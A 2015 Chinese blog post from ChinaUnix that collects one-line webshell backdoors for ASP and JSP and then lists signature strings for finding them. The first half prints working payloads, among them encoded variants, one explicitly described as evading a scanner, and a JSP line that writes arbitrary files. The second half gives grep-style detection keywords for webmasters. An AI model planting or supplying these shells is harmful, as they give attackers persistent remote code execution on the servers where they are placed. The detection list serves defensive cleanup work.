Chinaunix首页 | 论坛 | 博客
  • 博客访问: 10197836
  • 博文数量: 1669
  • 博客积分: 16831
  • 博客等级: 上将
  • 技术积分: 12594
  • 用 户 组: 普通用户
  • 注册时间: 2011-02-25 07:23
个人简介

柔中带刚,刚中带柔,淫荡中富含柔和,刚猛中荡漾风骚,无坚不摧,无孔不入!

文章分类

全部博文(1669)

文章存档

2023年(4)

2022年(1)

2021年(10)

2020年(24)

2019年(4)

2018年(19)

2017年(66)

2016年(60)

2015年(49)

2014年(201)

2013年(221)

2012年(638)

2011年(372)

分类: 网络与安全

2015-02-09 10:20:53

 

收集一些常见的webshell后门的特征码

 3954人阅读 评论(0)  举报

一些常见的webshell(asp,aspx,php,jsp等)后门木马。

什么是一句话木马?不了解的朋友百度一下。

一句话木马具体有以下这些,这些都是自己平时收集的。(当然收集不齐全,希望大家帮忙完善~)

============================

asp一句话木马:
<%%25Execute(request("a"))%%25>
<%Execute(request("a"))%>
%><%execute request("a")%><%

<%25Execute(request("a"))%25>
%><%execute request("yy")%>
<%execute request(char(97))%>
<%eval request(char(97))%>
":execute request("value"):a="

在数据库里插入的一句话木马
┼攠數畣整爠煥敵瑳∨∣┩愾
┼癥污爠煥敵瑳∨≡┩>   密码为: a

utf-7的马
<%@ codepage=65000%>
<% response.Charset="936"%>
<%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>

Script Encoder 加密
<%@ LANGUAGE = VBScript.Encode %>
<%#@~^PgAAAA==r6P. ;!+/D`14Dv&X#*@!@*ErPPD4+ P2Xn^ED+VVG4Cs,Dn;!n/D`^4M`&Xb*oBMAAA==^#~@%>

 

可以躲过雷客图的一句话。
<%
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.ExecuteStatement("ev"&"al(request(""1""))")
%>

php一句话





aspx一句话

JSP一句话后门 
<% 
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); 
%>

================================我是邪恶的分界线==============================

为什么收集这些东东?

有些站长说,webshell找到了,服务器打了补丁,网站漏洞也给补上了。甚至把整个web目录所有的文件都检查了多次,都没找到可疑的文件。为什么黑客还是让网站挂上木马了?

猜也猜得到拉,被放后门呗!那后门在哪?比较简单而且有效的方法当然是在正常文件里写入一句话木马了,以后连接上去就是了。况且杀毒软件对某些一句话木马不敏感,这个,玩黑的朋友都知道了~

也许你会问,能不能彻底把后门挖出来?这个难说~我就不敢保证了,哈哈。。。

不过下面这些或许对你有帮助。

下面整理了一些webshell后门的特征码(搜索的时候不要区分大小写):

asp木马特征:
aspshell
Execute(request
execute request(
eval request(
"ev"&"al(request(

ExecuteGlobal request
┼癥污爠煥敵瑳∨≡┩>

┼攠數畣整爠煥敵瑳∨∣┩愾
SqlRootkit
专用小马

小马

整站文件打包
确认解包吗
dama
不要干坏事
hack
fuck
郁闷,权限不够估计不能执行命令!

php木马特征:
base64
base64_decode
angle


phpspy
Scanners
打包下载
打包程序扩展名

asp.net木马特征:

ASPXSpy
专用小马

rootkit

jsp木马特征:

JFolder    (我就只有这个。。。)

 

以上面这些作为特征码,用这个工具advanced find and replace 搜索可疑的文件,或许会找出点邪恶的东西,还工具还可以批量清马,并支持正则表达式,站长必备工具,呵呵!

当然还可以按文件修改时间进行搜索可疑文件,不过有些webshell支持文件属性修改。

AFR下载地址:

之前转了个文章,这里有介绍

阅读(2132) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~